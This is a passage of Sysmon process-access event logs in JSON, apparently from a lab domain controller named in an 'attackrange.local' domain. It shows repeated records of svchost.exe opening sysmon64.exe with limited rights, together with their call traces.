C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3315,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3316,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3317,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3318,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3319,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3320,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3321,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3322,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 